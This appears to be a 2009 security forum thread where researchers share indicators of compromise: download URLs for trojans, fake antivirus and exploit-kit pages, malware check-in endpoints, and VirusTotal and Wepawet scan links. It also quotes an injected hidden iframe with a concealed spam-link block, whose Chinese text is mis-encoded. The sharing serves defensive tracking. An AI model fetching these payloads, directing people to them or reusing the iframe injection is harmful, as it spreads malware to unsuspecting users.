adultfex.com/lb/update.phphttp://www.virustotal.com/analisis/4718ef3d0a751e94ce3a0e20385283d995ee82136e9638892eaf6bbc4795a3e5-1245563087
Trojans:
slil.ru/27769294/2fcdca20.4a3e7138/adware_crypt.exehttp://www.virustotal.com/analisis/0a08059aeaa955de3f5d08546f28c83db855d761082c4205811819195e185b04-1245566730
freshdownloadcenter.com/install.48232.exehttp://www.virustotal.com/analisis/debf5446d9ed6394fa72bb78f52e4e6ccffe0e4ec8960a3b7c0a2e92a714c369-1245566838
www.adult-you-tube.info/downloads/setup.exehttp://www.virustotal.com/analisis/38700a97d35bf78118d3c48d5f37a9150c18d194de58adb43dc6da27942bfc6b-1245567493
72.9.108.26/install_10.exehttp://www.virustotal.com/analisis/186ef67fadf42ac6eaee2b5d26a093e9adef6178caa8b42bd3f825405892c4c8-1245567635
adwareindependence.com/ppc/f494.exehttp://www.virustotal.com/analisis/b5006cc39bf7a7ff6a1b71c6d9033f67657cffae429ae34bc01b3c2f42ea7157-1245567981
Fake AV(malware doctor):
adwareindependence.com/scan/mlw.exehttp://www.virustotal.com/analisis/bfc294ae9aa0da8fd65544bdea740fc48b94b1608c7f9d99e6092153dd2029cd-1245567989
Fake payment site:
secure.best-internet-payments.com/cgi-bin/nph-pr/pandora/softcore/buy_soft.php?productid=malwaredoc01&advert=494malware calls home(receive malware links with the right parameters):
softwaresense-search.com/stat.php
-
Exploits:
sterlate.comhttp://wepawet.iseclab.org/view.php?hash=f74e05ee99c0e925663a3451f1d85f34&t=1245570059&type=js
PDF:
sterlate.com/cache/readme.pdfFlash:
sterlate.com/cache/flash.swf(downloaded malware is offline)
Exploits:
sterlate.com/sng/index.phphttp://wepawet.iseclab.org/view.php?hash=d78519f72f81a626f04873713067717f&t=1245651339&type=js
PDF:
sterlate.com/sng/cache/readme.pdfFlash:
sterlate.com/sng/cache/flash.swfhttp://wepawet.iseclab.org/view.php?hash=253639a3e73fff185fbd4c489ab0335b&type=swf
Trojan:
sterlate.com/sng/load.php?id=5http://www.virustotal.com/analisis/a8ed3a72616d4d87020d37d7d2b90e2fcc32a5133d535d091970998fe39cd129-1245411696
Exploits(wepawet fails on this one):
forum.sc00d.cn/index.phphttp://jsunpack.jeek.org/dec/go?url=forum.sc00d.cn_index.php
PDF:
forum.sc00d.cn/pdf.php?id=11Trojan:
forum.sc00d.cn/load.php?id=11&spl=4http://www.virustotal.com/analisis/ff60d4703813e84c5237c95aa0f0c52295945c8f76f03152fa4dd6972e1b3263-1245649899
Trojans:
nsmercuryplanet.ru/dast.exehttp://www.virustotal.com/analisis/7d515de9754257b6d5cbc05682bb7d82d2d7c92786f51bb9fecd291f64ad6739-1245649810
gold-smerch.cn/flash.exehttp://www.virustotal.com/analisis/140a5961f36bd6a2645f77e74defd8985084f6a6fed6592920aba48eb511ea7d-1245649827
Malware calls home:
bytecode.biz/stats/in.php
-
More rogue sites:
Internetware-safe.com
Kingpinservers.info
Mal-warexls.net
http://youravprotection.com/support
http://www.registerantivirus.com/
http://www.avprotectionstat.com/index.php
-
hXXp://ribboninn.com/djellow.exe
[VT 5/41]
http://www.virustotal.com/sv/analisis/3a93b168267d7ddc8c034303b817e0ea297a000df40761bb7f5a79faa68bb295-1245847100 (http://www.virustotal.com/sv/analisis/3a93b168267d7ddc8c034303b817e0ea297a000df40761bb7f5a79faa68bb295-1245847100)
-
Another site, same file as above
http://76380.webhosting29.1blu.de/djellow.exe
-
New binary and URL
http://www.hzcpwl.cn/djellow.exe
[VT 6/41]
http://www.virustotal.com/sv/analisis/2b27e47c7f8d2195d5473d400a1e4ccec79049c6d84203e27003e5e2daaa95b7-1245924902 (http://www.virustotal.com/sv/analisis/2b27e47c7f8d2195d5473d400a1e4ccec79049c6d84203e27003e5e2daaa95b7-1245924902)
-
http://transein.com/_test_01-07/getexe.php
[VT 5/41]
http://www.virustotal.com/sv/analisis/7d168c70d66f83b9876c31227af4e595b5d40ea03df6a624f8669c2cddb9661f-1245929271 (http://www.virustotal.com/sv/analisis/7d168c70d66f83b9876c31227af4e595b5d40ea03df6a624f8669c2cddb9661f-1245929271)
-
http://213.182.197.42/load.php[VT 10/41]
http://www.virustotal.com/sv/analisis/2cc7714f5b1d89fd90aa73df48f1770f1e7222553fe1955542ca82194f114d18-1245941662 (http://www.virustotal.com/sv/analisis/2cc7714f5b1d89fd90aa73df48f1770f1e7222553fe1955542ca82194f114d18-1245941662)
PDF
http://213.182.197.42/pdf.php[VT 10/41]
http://www.virustotal.com/sv/analisis/0ce86e1f37aa5fd6651a2d40bf9b3c3d9dce6859a4fabf0e72fdff2de42a1f1d-1245941687
(http://www.virustotal.com/sv/analisis/0ce86e1f37aa5fd6651a2d40bf9b3c3d9dce6859a4fabf0e72fdff2de42a1f1d-1245941687)
Flash
http://213.182.197.42/swf.php[VT 9/41]
http://www.virustotal.com/sv/analisis/ff04bb1c9f9b2d20ec22cabbd6c7d6e382762961080440a9418731a4b05be15d-1245941702 (http://www.virustotal.com/sv/analisis/ff04bb1c9f9b2d20ec22cabbd6c7d6e382762961080440a9418731a4b05be15d-1245941702)
-
Trojans:
satanic.easycoding.org/file.exehttp://www.virustotal.com/analisis/eb70c986ee061898ce2c23e2b37a92a65458f0744aebe2e4e7838a70023cafec-1245985908
keule557.cn/2.exehttp://www.virustotal.com/analisis/0bb0fab4f476de542bcae7b8338793e705d4bbaad2511210e94958784e45aec3-1245985956
keule557.cn/805.exehttp://www.virustotal.com/analisis/d1ab115a3b62876adcbd571be2be685e1af1672f506b8a084e52308fc5dbdcd9-1245985980
usrvnu.ru/infect.phphttp://www.virustotal.com/analisis/b7b4f921db11b06919834a8f8b2c96efabe8d6919da067ea011d736e37c2187e-1245986114
roons.cn/ded/Project2.exehttp://www.virustotal.com/analisis/d07e34d88fa067fe1d942670df0dad29e555fd5841a19f46d47dd56f50f74be5-1245986217
Trojan Pinch:
woons.cn/pinch_no_cript.exe
-
zbot
http://javiercubel.com/statement_45365352.exe
[VT9/41]
http://www.virustotal.com/sv/analisis/046d3796c3dc4620f2c54c6439f11a5f4dd3faf4d513ed0dcb9f640780009022-1246020252 (http://www.virustotal.com/sv/analisis/046d3796c3dc4620f2c54c6439f11a5f4dd3faf4d513ed0dcb9f640780009022-1246020252)
-
Zbot
http://update.microsoft.com.hillij.com/microsoftofficeupdate/isapdl/default.aspx/officexp-KB910721-FullFile-ENU.exe
[VT 13/41]
http://www.virustotal.com/sv/analisis/b6c9a2125a43133d681be0e27aac281f404e29b5e6f031d04a789ff6f0bc8218-1246048421 (http://www.virustotal.com/sv/analisis/b6c9a2125a43133d681be0e27aac281f404e29b5e6f031d04a789ff6f0bc8218-1246048421)
-
PSW Trojan Fun:
http://winddk.ch.ma/dd.txtLeads to:
http://ztb.cztv.tv/360/1.exe
http://ztb.cztv.tv/360/2.exe
http://ztb.cztv.tv/360/7.exe
http://ztb.cztv.tv/360/88.exe
http://ztb.cztv.tv/360/9.exe
Been a while since I visited. Hope all is well with everyone! ;)
-
http://artmarket.or.kr/ecard.exe
[VT 6/41]
http://www.virustotal.com/sv/analisis/89e12bf34116897c63b6e1a98a328e16222f33dab4b2aee2400c60aa3e7a1aaf-1246197175 (http://www.virustotal.com/sv/analisis/89e12bf34116897c63b6e1a98a328e16222f33dab4b2aee2400c60aa3e7a1aaf-1246197175)
-
195.190.13.106 / Cutwail
hxxp://109438129432.cn/load.phpVirusTotal (http://www.virustotal.com/analisis/a1275ed1572e9eed052ebbcadaec941df6b0fccac2990a993ad32227bbc1ca4b-1244801070) - 23/40 (57.50%)
hxxp://234273849543.cn/load.phpVirusTotal (http://www.virustotal.com/analisis/a1275ed1572e9eed052ebbcadaec941df6b0fccac2990a993ad32227bbc1ca4b-1244801070) - 23/40 (57.50%)
hxxp://438723847234.cn/load.phpVirusTotal (http://www.virustotal.com/analisis/ce5ce251673ad3b9a00a8d3e3216d0435802c072f3e3460f9046c015a8eac075-1245938186) - 12/41 (29.27%)
ThreatExpert (http://www.threatexpert.com/report.aspx?md5=c05177060951769a260d29186dd978e2)
--
61.235.123.140
exploits / trojan
hxxp://witsibux.cn/hi/index.php
hxxp://witsibux.cn/hi/update.php
hxxp://witsibux.cn/hi/belowNotH.pdf
hxxp://witsibux.cn/hi/humourOf.swf
Wepawet (http://wepawet.iseclab.org/view.php?hash=a284924f3529a5d4d08b4e09a2453194&t=1246209781&type=js)
VirusTotal (http://www.virustotal.com/analisis/14d44d74e33ce1caeaf523632c346ec70b86767dec196b5d66ef87b77b08bde4-1246209825) - 2/41 (4.88%)
-
Some more fun:
http://mm.cj-vv.cn:8888/mm/lm/new1.exe
http://mm.cj-vv.cn:8888/mm/lm/new2.exe
http://mm.cj-vv.cn:8888/mm/lm/new4.exe
http://mm.cj-vv.cn:8888/mm/lm/new6.exe
http://mm.cj-vv.cn:8888/mm/lm/new7.exe
http://mm.cj-vv.cn:8888/mm/lm/new8.exe
http://mm.cj-vv.cn:8888/mm/lm/new9.exe
http://mm.cj-vv.cn:8888/mm/lm/new10.exe
http://mm.cj-vv.cn:8888/mm/lm/new11.exe
http://mm.cj-vv.cn:8888/mm/lm/new12.exe
http://mm.cj-vv.cn:8888/mm/lm/new14.exe
http://mm.cj-vv.cn:8888/mm/lm/new15.exe
http://mm.cj-vv.cn:8888/mm/lm/new16.exe
http://mm.cj-vv.cn:8888/mm/lm/new17.exe
http://mm.cj-vv.cn:8888/mm/lm/new20.exe
http://mm.cj-vv.cn:8888/mm/lm/new21.exe
http://mm.cj-vv.cn:8888/mm/lm/new23.exe
http://mm.cj-vv.cn:8888/mm/lm/new24.exe
http://mm.cj-vv.cn:8888/mm/lm/new25.exe
http://mm.cj-vv.cn:8888/mm/lm/new26.exe
http://mm.cj-vv.cn:8888/mm/jx/new3.exe
http://mm.cj-vv.cn:8888/mm/jx/new4.exe
http://mm.cj-vv.cn:8888/mm/jx/new5.exe
http://mm.cj-vv.cn:8888/mm/jx/new6.exe
http://mm.cj-vv.cn:8888/mm/jx/new7.exe
http://mm.cj-vv.cn:8888/mm/jx/new8.exe
http://mm.cj-vv.cn:8888/mm/jx/new11.exe
http://mm.cj-vv.cn:8888/mm/jx/new12.exe
http://mm.cj-vv.cn:8888/mm/jx/new13.exe
-
hxxp://dcvs.chc.edu.tw/classfix/default.asp (Mal/Iframe-I)
-
Can you double check that one please? (hostname is failing to resolve from several locations over here)
-
liesbethmilan.be/1/captcha6.exe
liesbethmilan.be/1/ms.19.exe
-
FO
-
Can you double check that one please? (hostname is failing to resolve from several locations over here)
Add a www to it or use google the domain name but there is more than just that one and cant see where any exploits popped out. ???
After the closing html tag, i see the following:
<iframe src=http://www.3prince.com/kmdr/guest/images/_vti_cnf/tt/rp.htm width=30 height=0><div style="position: absolute; top: -999px;left: -999px;">
��������:
<a href="http://www.kryiyi.com">����һ��˽���l��վ</a>
<a href="http://www.61hj.com">Ӣ�ۺϓ�˽���l��վ</a>
<a href="http://www.reeltop.com">�ڿͽ��W</a>
<a href="http://www.941fc.com">����Ҫ�l??Ӱ�W</a>
<a href="http://www.ddoscc.cn">DDOS������,CC������˽�����������W�ɹ�����</a>
<a href="http://www.10004y.cn">�@���ӵ�˽��</a>
<a href="http://www.gfsj.org.cn">��������˽��</a>
<a href="http://www.3ky.org.cn">DDOS����?����DDOS���Rԭ����DDOS��������������ddos��������IP������</a>
<a href="http://1104f.cn">�@���ӵ�</a>
</div>
The iframed url returns http status code 404. I guess this is, where the exploits came from.
Most of the hosts resolve to 61.160.213.47, except of
w ww.941fc.com (NXDOMAIN)
w ww.ddoscc.cn (CNAME url.xundns.net -> 120.72.34.251)
w ww.10004y.cn (58.252.208.172)
w ww.ddoscc.cn returns:
HTTP/1.1 200 OK
Date: Mon, 29 Jun 2009 13:53:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 64
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCATCSDAA=DAOPAKFAOJEIFGHFMGKLFDLD; path=/
Cache-control: private
<meta http-equiv="refresh" content="0;url=http://ddoscc.cn">
ddoscc.cn again resolves to 61.160.213.47.
Trying to access these hosts on 61.160.213.47 always ends with the connection being interrupted/reset by the server.
w ww.10004y.cn does not contain anything malicious from a quick look.
-
Pinch:
turbina.net/modules/w/load/exec.phphttp://www.virustotal.com/analisis/2cb4599b35deaacebdb1746918564ace0ebb0560e0fc7d7e9e14703bcd8590ea-1246346258
Emold:
nat77.biz/123.exehttp://www.virustotal.com/analisis/1b379fc266bf6ea59a945d77b54a4945c39012020739e90a621d8c21a6b4c62a-1246348304
iframecash.net/cache/bin/main.exe http://www.virustotal.com/analisis/9fcdcd460db594f5143457b2c52acbe509fb2abefb713e77f2d91e0184aa8888-1246348532
Fake AV:
pornotube915.com/scan
Trojans:
hzone66.cn/preloader_9.exehttp://www.virustotal.com/analisis/beb6f3ed69235697bcbc018198fb0228d683da9a9a2943984b3b3ba7431b328d-1246333025
niph-kosova.org/server3.exehttp://www.virustotal.com/analisis/a5fd40f7a8c7686f68ead6219ed842e129f6200c70cb4d5e61d1f8de35cf5d5c-1246346783
91.189.113.210/t.exehttp://www.virustotal.com/analisis/4452581e37cb7aedcfc68d937988785cd6d55a938f267b4beb87f1227cbb2db3-1246347754
79.174.64.36/ldr.exehttp://www.virustotal.com/analisis/05cdd3f1b6a8a8ba47391b5506ef1fbddd361f85bf24d54887c48eae2eb28cba-1246347842
casinousa.cn/lsass.exehttp://www.virustotal.com/analisis/324b639b727842e2b6854915ea7cc5018fba336386a9773720e4520abb701751-1246347934
winsofter.ru/out.exehttp://www.virustotal.com/analisis/14bd1b39cc6c4e23ce4a2ebc5e94676e850e0a91caf03af8d1ab3e6dcc9377c7-1246348063
missing-codecs.net/download/install_flash_player.exehttp://www.virustotal.com/analisis/c90303b43ad53fb5a223a72d13256bf9175cd63013053ce5f4de4de4a8eaef0c-1246350478
Exploits(wepawet and jsunpack fail on this)
svazkusavip.com/counter/index.phpPDF:
svazkusavip.com/counter/dummyButAre.pdf flash:
svazkusavip.com/counter/alwaysWord.swftrojan(downloader):
svazkusavip.com/counter/update.phphttp://www.virustotal.com/analisis/ddc27e9df2e8cdae43d75c5a1db53b1876a47c219000d5735460496b5298c1a8-1246347509
Exploits(wepawet fails on this one)
nah77.biz/myy/index.phphttp://jsunpack.jeek.org/dec/go?url=nah77.biz_myy_index.php
PDF:
nah77.biz/myy/pdf.phpTrojan(emold):
nah77.biz/myy/load.phphttp://www.virustotal.com/analisis/5b2536fccffdcbaf1d6538e01f34cde8ce104b1bced4cc42d1b64d554283698f-1246349005
Exploits(wepawet and jsunpack fail on this)
imagehut5.cn/index.phpPDF:
imagehut5.cn/pdf.php?id=2Trojan:
imagehut5.cn/load.php?id=2http://www.virustotal.com/analisis/301a24d763c36477cfc192c27b95c83a4801f75f98f0f7c2a5fe86973e9d4422-1246349595
Trojan downloaded by the above(change tcpip.sys)
85.114.141.207/EvID4226Patch.exehttp://www.virustotal.com/analisis/0d78fc5700892aee90cd409716b2f6e1a844da5e85e563eaac631a58d8d0edc2-1246349673
-
2:http://mmdeai.3322.org/atievx.exe
2:http://milllk.com/wm/svchost.exe
2:http://havvvha.com/xiao/aa1.exe
2:http://havvvha.com/xiao/aa2.exe
2:http://havvvha.com/xiao/aa3.exe
2:http://havvvha.com/xiao/aa4.exe
1:http://havvvha.com/xiao/aa5.exe
2:http://havvvha.com/xiao/aa6.exe
2:http://havvvha.com/xiao/aa7.exe
2:http://havvvha.com/xiao/aa8.exe
2:http://havvvha.com/xiao/aa9.exe
2:http://havvvha.com/xiao/aa10.exe
2:http://havvvha.com/xiao/aa11.exe
2:http://havvvha.com/xiao/aa12.exe
2:http://havvvha.com/xiao/aa13.exe
2:http://havvvha.com/xiao/aa14.exe
2:http://havvvha.com/xiao/aa15.exe
2:http://havvvha.com/xiao/aa16.exe
2:http://havvvha.com/xiao/aa17.exe
2:http://havvvha.com/xiao/aa18.exe
2:http://havvvha.com/xiao/aa19.exe
2:http://havvvha.com/xiao/aa20.exe
2:http://havvvha.com/xiao/aa21.exe
2:http://havvvha.com/xiao/aa22.exe
2:http://havvvha.com/xiao/aa23.exe
2:http://havvvha.com/xiao/aa24.exe
2:http://havvvha.com/xiao/aa25.exe
2:http://havvvha.com/xiao/aa26.exe
2:http://havvvha.com/xiao/aa27.exe
2:http://havvvha.com/xiao/aa28.exe
2:http://havvvha.com/xiao/aa29.exe
2:http://havvvha.com/xiao/aa30.exe
2:http://havvvha.com/xiao/aa31.exe
2:http://havvvha.com/xiao/aa32.exe
2:http://havvvha.com/xiao/aa33.exe
2:http://havvvha.com/xiao/aa34.exe
2:http://havvvha.com/xiao/aa35.exe
2:http://havvvha.com/xiao/aa36.exe
2:http://havvvha.com/xiao/1.exe
-
121.12.115.11:886/cao/aa1.exe
121.12.115.11:886/cao/aa2.exe
121.12.115.11:886/cao/aa3.exe
121.12.115.11:886/cao/aa4.exe
121.12.115.11:886/cao/aa5.exe
121.12.115.11:886/cao/aa6.exe
121.12.115.11:886/cao/aa7.exe
121.12.115.11:886/cao/aa8.exe
121.12.115.11:886/cao/aa9.exe
121.12.115.11:886/cao/aa10.exe
121.12.115.11:886/cao/aa11.exe
121.12.115.11:886/cao/aa12.exe
121.12.115.11:886/cao/aa13.exe
121.12.115.11:886/cao/aa14.exe
121.12.115.11:886/cao/aa15.exe
121.12.115.11:886/cao/aa16.exe
121.12.115.11:886/cao/aa17.exe
121.12.115.11:886/cao/aa18.exe
121.12.115.11:886/cao/aa19.exe
121.12.115.11:886/cao/aa20.exe
121.12.115.11:886/cao/aa21.exe
121.12.115.11:886/cao/aa23.exe
121.12.115.11:886/cao/aa25.exe
121.12.115.11:886/cao/aa26.exe
121.12.115.11:886/cao/aa27.exe
121.12.115.11:886/cao/aa28.exe
121.12.115.11:886/cao/ms.exe
x9s7b.cn:8808/a/lzz.css
x9s7b.cn:8808/a/ms.css
x9s7b.cn:8808/a/real11.css
-
Fake AV:
pornotube914.com/scan
atoylev.cn/?wm=70321
-
mvt.c4.fr/a.css
mavr-best.com/ldr/bot.exe
-
pornotube915.com/codec/.exe
74.52.164.210/pk/bb090621.exe
-
megavipsite.cn/av/iframe/socks.exe
l3world.ru/l2.exe
-
freett.com/950065/guama.exe
freett.com/950065/cq.exe
freett.com/950065/arp.exe
freett.com/950065/qn3.exe
freett.com/950065/pt.exe
freett.com/950065/hb1.exe
xoomer.alice.it/email02/bom.jpg
hxxp://www.fanv.cn/d.exe
hxxp://www.fei4.cn/aa.exe
-
hxxp://x.b76.net/winres.exe
hxxp://web2.51.la/go.asp?svid=40&id=2941498&tpages=1&ttimes=1&tzone=8&tcolor=32&sSize=1280,1024&referrer=&vpage=hxxp%3A//stat.winrar2009.cn%3A88/ic.htm
hxxp://bewfsnfwka.net/uniq.php?id=1883789557&p=0
hxxp://bgukeumzwz.net/ccsuper1.php
hxxp://bgukeumzwz.net/ccsuper0.php
hxxp://web2.51.la/go.asp?svid=40&id=2941498&tpages=
hxxp://click0617.winrar2009.cn:88/files/click.jpg
hxxp://bgukeumzwz.net/ccsuper2.php
hxxp://www.51.la/?002941498
hxxp://heyjoy.cn/612.exe
hxxp://img.users.51.la/2941498.asp
hxxp://web2.51.la/go.asp?svid=40&id=2941498&tpages=2&ttimes=1&tzone=8&tcolor=32&sSize=1280,1024&referrer=&vpage=hxxp%3A//stat.winrar2009.cn%3A88/ic.htm
hxxp://www.51.la/?2941498
hxxp://web2.51.la/go.asp?svid=40&id=2941498&tpages=3&ttimes=1&tzone=8&tcolor=32&sSize=1280,1024&referrer=&vpage=hxxp%3A//stat.winrar2009.cn%3A88/ic.htm
hxxp://ppc0617.winrar2009.cn:88/d.txt
hxxp://bgukeumzwz.net/ccsuper3.php
-
hxxp://www.area03601.com/components/k.exe
hxxp://www.area03601.com/components/w.exe
iarc.er-robotics.org/images/wingb.dll
iarc.er-robotics.org/images/gbtext.dll
hxxp://www.toncom.net/images/indexn.gif
lawd.poloi999.cn/down/dnf9m.exe
lawd.poloi999.cn/down/tl9m.exe
lawd.poloi999.cn/down/mhxu9m.exe
lawd.poloi999.cn/down/mhxu9m1.exe
lawd.poloi999.cn/down/qq3g9m.exe
lawd.poloi999.cn/down/qq3g9m1.exe
lawd.poloi999.cn/down/wmgj9m.exe
lawd.poloi999.cn/down/zx9m.exe
lawd.poloi999.cn/down/wd9m.exe
lawd.poloi999.cn/down/dh29m.exe
lawd.poloi999.cn/down/qqhx9m.exe
lawd.poloi999.cn/down/mu9m.exe
lawd.poloi999.cn/down/zt9m.exe
lawd.poloi999.cn/down/cqsj9m.exe
lawd.poloi999.cn/down/dj9m.exe
lawd.poloi999.cn/down/wl9m.exe
lawd.poloi999.cn/down/jxsj9m.exe
lawd.poloi999.cn/down/xc9m.exe
lawd.poloi999.cn/down/tx29m.exe
lawd.poloi999.cn/down/zu9m.exe
lawd.poloi999.cn/down/dh39m.exe
lawd.poloi999.cn/down/hx29m.exe
lawd.poloi999.cn/down/dhwd9m.exe
lawd.poloi999.cn/down/zzh9m.exe
lawd.poloi999.cn/down/jr9m.exe
lawd.poloi999.cn/down/cp9m.exe
lawd.poloi999.cn/down/kx9m.exe
lawd.poloi999.cn/down/cqwd9m.exe
lawd.poloi999.cn/down/rxjh9m.exe
lawd.poloi999.cn/down/CJSH9M.exe
lawd.poloi999.cn/down/WZSJ9M.exe
lawd.poloi999.cn/down/aion9m.exe
lawd.poloi999.cn/down/qqmo.exe
lawd.poloi999.cn/down/qqma1.exe
ssl1899.websiteseguro.com/box10/errors.exe
ssl1899.websiteseguro.com/box10/3.exe
up.cj-vv.cn:889/up1/up.exe
-
http://securitybestonline.com/hitin.php?land=20&affid=21300
http://netsecurityweb.com/hitin.php?land=20&affid=20100
http://goscanany.com/?uid=13005
http://av-scan-64.com/?id=48040
http://therealsecurityshields.com/page.php?id=73
http://6-tube-world.com/xplaymovie.php?id=40012
http://downloadfixandlove1.com/file.exe
http://downloadfixandlove.com/pcdef.exe
http://video-tube.cn/tds3/in.cgi?5
http://green-tube-site.com/xplaymovie.php?id=45095
http://exedoc.com/TubeViewer.ver.6.48022.exe
http://exedoc.com/av-scanner.48040.exe
http://theexe.com/streamviewer.45059.exe
-
"PC Security 2009"
braviax/brastk advertised rogue
http://pcsecurity2009.com/
Kuxx.info
http://pcsecassal.com/1/installer/Installer2.exe
http://pcsecureredirect2.com/?wmid=1025&d=1&it=2&s=1
pcsecurity-2009.com
-
Rogue related sites:
http://Anti-virus-best.com
http://anti-virus-best.info/install.php
http://download.anti-virus-best.info/dl/PreInstaller.exe
http://Sprut-cluster.info
http://genantivirus.com/download/GeneralAntivirus.exe
http://check-for-threats.us/5/11/0/wsetup.exe
http://securitytrial.com/hitin.php?land=30&affid=21700
http://securitytrial.com/download.php?affid=21700
-
Fake porn and associated trojan distributing sites
http://yourtubetop.com/xplaymovie.php?id=45095
http://exe-paste.com/onlinemovies.45095.exe
http://testtubefilms.com/xfreeporn.php?id=48022
http://exe-porto.com/onlinemovies.1.48022.exe
-
Long time no post....
Fake AV:
axevoq.cn
scanmeta6.info
Fake AV downloader:
x-daily.com/st/img/z/http://www.virustotal.com/analisis/ec8f810f10303fd92dbd71cad82e4f88b4eeb1a106e0c7f19deb6783d85cff8a-1247469472
Trojans:
krisnet.cn/test/mss8.exehttp://www.virustotal.com/analisis/514a5b90e717557b021dc3db33db42306dc98d40244fc5d6ae8bbe35bf85d3f9-1247471742
analitics.in/load.php?id=5 http://www.virustotal.com/analisis/638fe7388525c7921a8a25dcdbb724cd2e30191ca61146640abd7bedd0ee37c5-1247474875
goodtraff.ru/exe.phphttp://www.virustotal.com/analisis/8fef564cab88a2e50d46ba0ecf29962dc8ccb1a47f7b0aabb8d4b0202e2a6412-1247301460
onuka.cn/dll/mal.txthttp://www.virustotal.com/analisis/d979c2f805ce2e01d21e49aad39e3ff0f2aa7e98c86b0e5671a7c4868bfa5640-1247482711
Trojan Emold:
puppsik.biz/bin/mainokK.exe http://www.virustotal.com/analisis/1fe41137eacfc78a731628bfb77cb9e32453905fbf19e8bd89cbdbe713d37b4c-1247475919
PDF exploit:
www.tech2tech.cn/pack/pdf.phpTrojan:
www.tech2tech.cn/pack/load.phpwww.virustotal.com/analisis/5e93068f29e3de9cc46273a20daebecb3e0f837b7ad38454032ff040af1502fb-1247175304
PDF Exploit:
updatedate.cn/img/pfqf2.php
updatedate.cn/img/pfqf.phpTrojan:
updatedate.cn/img/uet.php http://www.virustotal.com/analisis/6779fd91fd3f3a9aa17e1198af5f599d50bc8e17f0c0abd0232dd67ab02cf1f6-1247467328
Exploits:
bezopbizn.ru/up/index.phphttp://wepawet.iseclab.org/view.php?hash=e49b5e3e7e53eb102b9b915e12a455cf&t=1247471805&type=js
PDF
bezopbizn.ru/up/pdf.phpTrojan Emold:
bezopbizn.ru/up/getexe.phphttp://www.virustotal.com/analisis/357a0ba3ef66843d5cb8ff4e6098aa57f380888d710827b6d99a5d30fe222cbc-1247472448
contain iframe to Exploits:
sulidev.com/ie.phphttp://wepawet.iseclab.org/view.php?hash=fa8b3589b1dbf71ff281b646934c86aa&t=1247478460&type=js
Exploits:
usrvnu.ru/shot.php?aff=1http://wepawet.iseclab.org/view.php?hash=39123a5ebfa961048ee1c9619780defe&t=1247478902&type=js
usrvnu.ru/ds94685.htmhttp://wepawet.iseclab.org/view.php?hash=aac8d2b75e2eeabfc06fc7f2e3107584&t=1247478766&type=js
usrvnu.ru/ds94685.jpghttp://wepawet.iseclab.org/view.php?hash=791a64ca4f4d3dc353b02935ec3aaf5c&t=1247478925&type=js
PDF:
usrvnu.ru/pdf.php?id=94685
Exploits:
ferarilatka.cn/exp/index.phphttp://wepawet.iseclab.org/view.php?hash=8030471c9b20f1a008be9c8ee9218bca&t=1247479213&type=js
PDF:
ferarilatka.cn/exp/koxyebuth.pdfFlash:
ferarilatka.cn/exp/xyachuch.swfTrojan Oficla:
ferarilatka.cn/exp/update.phphttp://www.virustotal.com/analisis/dc118a1cf32b0d2a69d1629318f7072d0fb4d915c50372b534c892223d5fde45-1247479392
Exploits:
wesssrett.cn/catalog/index.phpPDF:
wesssrett.cn/catalog/theirTextLayout.pdfTrojan oficla:
wesssrett.cn/catalog/update.php http://www.virustotal.com/analisis/dc118a1cf32b0d2a69d1629318f7072d0fb4d915c50372b534c892223d5fde45-1247152324
Exploits:
thetests.net/yes/index.phphttp://wepawet.iseclab.org/view.php?hash=c8e7a115937fdb157ccc26bca75fab21&t=1247481445&type=js
PDF:
www.thetests.net/yes/include/spl.php?stat=Windows XP|Internet Explorer 7.0|US|Internet ExplorerTrojan:
www.thetests.net/yes/load.php?s=6http://www.virustotal.com/analisis/80f0b51b1153675c5a111db83d1a409c3730a67f73273368197a35440fdfc7f6-1247247444
Exploits:
webalfa.cn/pab/index.phphttp://wepawet.iseclab.org/view.php?hash=fce245c8bb2cd14ff823671322a196cf&t=1247481888&type=js
PDF:
webalfa.cn/pab/include/spl.php?stat=Windows XP|Internet Explorer 7.0|US|128.111.48.95Trojan:
webalfa.cn/pab/load.phphttp://www.virustotal.com/analisis/dbb5472ac5c82fc089c2a48f9514a6273548ec36c41db49e5bb9e31a7b4c4db7-1247482366
-
hxxp://hotexefiles.com/onlinemovies.45080.exe
http://www.virustotal.com/analisis/f1a9d76bfa53a8ebb94c3c9a6ce4dd0c2ce1766f64be2d353c1d2db8b041f45c-1247534725
-
System Security rogue related sites
http://sucupdate.com/download.php?affid=00000
http://zocleaner.com/download.php?affid=00000
Trojan
exenetsfiles.com/onlinemovies.1.48040.exe
http://sexfreetube.net/movies/download/free_stream_video.exe
http://sexfreetube.net/movies/download/codec.exe
-
Hi Folks another bunch of malware in the wild:
see also http://support.clean-mx.de/clean-mx/viruses?response=alive (http://support.clean-mx.de/clean-mx/viruses?response=alive)
-- gerhard
+---------------------+------------+-----------------------------------------------------------+-----------------+------------------------------+---------+--------+-----------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| timestamp | scanner | virusname | review | email | country | source | netname | url |
+---------------------+------------+-----------------------------------------------------------+-----------------+------------------------------+---------+--------+-----------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| 2008-08-18 21:20:02 | trendmicro | TROJ_XCHANGER.B | 77.235.49.27 | phone: +302106560551 | NL | RIPE | GR-EUROVPS-20070517 | http://www.operasofia.com/install.exe |
| 2009-05-19 03:55:04 | avira | TR/Dropper.Gen | 201.12.119.15 | sistemas@intelignet.com.br | BR | LACNIC | 002.421.421/0001-11 | http://201.12.119.15/Cadastramento.exe |
| 2009-05-25 17:55:09 | avira | DR/FakeAV.MX | 221.5.74.38 | abuse@cnc-noc.net | CN | APNIC | CNCGROUP-GD | http://dl.guarddog2009.com/av.exe |
| 2009-06-23 23:55:13 | avira | TR/Spy.Banker.ABPR | 60.208.77.210 | abuse@cnc-noc.net | CN | APNIC | CNCGROUP-SD | http://60.208.77.210/MOD/MODULO-ITAU.exe |
| 2009-06-24 02:55:18 | avira | TR/ATRAPS.Gen | 208.196.247.108 | NETQ@aitcom.net | US | ARIN | UUNET1996B | http://208.196.247.108/awstats/classes/src/Telegrama-7614.scr |
| 2009-06-30 14:01:49 | avira | TR/Dldr.Fake.CGAV | 76.76.103.164 | abuse@existhosting.com | CA | ARIN | INTERWEB-MEDIA | http://guardlab2009.biz//InstallerWF.exe |
| 2009-06-30 14:01:49 | avira | TR/Dldr.Fake.CGAV | 76.76.103.164 | abuse@existhosting.com | CA | ARIN | INTERWEB-MEDIA | http://guardlab2009.net//InstallerWF.exe |
